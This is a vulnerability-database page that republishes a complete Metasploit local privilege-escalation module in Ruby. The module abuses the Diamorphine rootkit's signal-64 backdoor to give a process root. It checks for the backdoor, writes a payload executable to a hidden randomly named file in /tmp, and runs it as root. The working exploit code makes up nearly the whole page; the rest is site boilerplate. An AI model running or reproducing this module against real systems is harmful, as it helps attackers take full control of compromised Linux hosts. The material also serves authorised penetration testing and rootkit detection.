Lucene search
K

Diamorphine Rootkit Signal Privilege Escalation

🗓️ 20 Feb 2020 00:00:00Reported by m0nadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 82 Views

This module uses Diamorphine rootkit's privesc feature using signal 64 to elevate the privileges of arbitrary processes to UID 0 (root). It has been tested successfully with Diamorphine from `master` branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64)

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Diamorphine Rootkit Signal Privilege Escalation',  
'Description' => %q{  
This module uses Diamorphine rootkit's privesc feature using signal  
64 to elevate the privileges of arbitrary processes to UID 0 (root).  
  
This module has been tested successfully with Diamorphine from `master`  
branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'm0nad', # Diamorphine  
'bcoles' # Metasploit  
],  
'DisclosureDate' => '2013-11-07', # Diamorphine first public commit  
'References' =>  
[  
['URL', 'https://github.com/m0nad/Diamorphine']  
],  
'Platform' => ['linux'],  
'Arch' => [ARCH_X86, ARCH_X64],  
'SessionTypes' => ['shell', 'meterpreter'],  
'Targets' => [['Auto', {}]],  
'Notes' =>  
{  
'Reliability' => [ REPEATABLE_SESSION ],  
'Stability' => [ CRASH_SAFE ]  
},  
'DefaultTarget' => 0))  
register_options [  
OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])  
]  
register_advanced_options [  
OptBool.new('ForceExploit', [false, 'Override check result', false]),  
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])  
]  
end  
  
def signal  
datastore['SIGNAL'].to_s  
end  
  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def upload_and_chmodx(path, data)  
print_status "Writing '#{path}' (#{data.size} bytes) ..."  
write_file path, data  
chmod path, 0755  
end  
  
def cmd_exec_elevated(cmd)  
vprint_status "Executing #{cmd} ..."  
res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s  
vprint_line res unless res.blank?  
res  
end  
  
def check  
res = cmd_exec_elevated 'id'  
  
if res.include?('invalid signal')  
return CheckCode::Safe("Signal '#{signal}' is invalid")  
end  
  
unless res.include?('uid=0')  
return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")  
end  
  
CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")  
end  
  
def exploit  
unless check == CheckCode::Vulnerable  
unless datastore['ForceExploit']  
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'  
end  
print_warning 'Target does not appear to be vulnerable'  
end  
  
if is_root?  
unless datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'  
end  
end  
  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
payload_name = ".#{rand_text_alphanumeric 8..12}"  
payload_path = "#{base_dir}/#{payload_name}"  
upload_and_chmodx payload_path, generate_payload_exe  
register_file_for_cleanup payload_path  
  
cmd_exec_elevated "#{payload_path} & echo "  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation